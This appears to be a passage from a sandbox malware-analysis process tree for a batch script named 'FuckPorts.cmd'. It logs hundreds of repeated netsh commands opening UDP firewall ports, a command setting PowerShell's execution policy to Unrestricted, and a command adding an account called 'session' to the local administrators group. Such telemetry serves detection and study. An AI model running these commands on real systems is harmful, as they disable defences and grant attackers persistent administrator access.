    PID:3320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5008
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4332
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4784
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:400
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1868
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3704
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5076
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:5020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4340
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3664
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4860
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3424
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4860
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:5100
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2628
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3512
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4748
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4860
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1788
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1184
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:676
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2220
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2432
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3704
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4072
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4920
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2628
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:1864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    PID:3132
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:4532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:3128
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3448
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1344
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4260
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1280
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3448
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1672
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2216
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4680
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3480
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3912
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1580
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4540
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4248
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4124
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3520
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3136
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2812
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1876
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4776
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3132
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2812
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4540
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3488
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1140
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:720
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:736
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3960
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:720
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4680
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2352
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4332
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3960
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5008
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3720
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3408
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4440
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:5112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3372
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3208
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3708
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4332
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2172
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2080
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3044
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4784
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1052
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3820
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3564
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3088
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4312
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4920
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4340
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3492
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3720
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3564
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3424
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3960
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:5040
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1352
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3820
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1788
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4472
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4892
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3968
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3736
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1140
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3496
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3220
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2160
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5040
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3752
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2220
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4784
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3496
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2012
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2116
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1052
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5084
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3736
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4912
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4300
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2116
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1680
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3496
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:3204
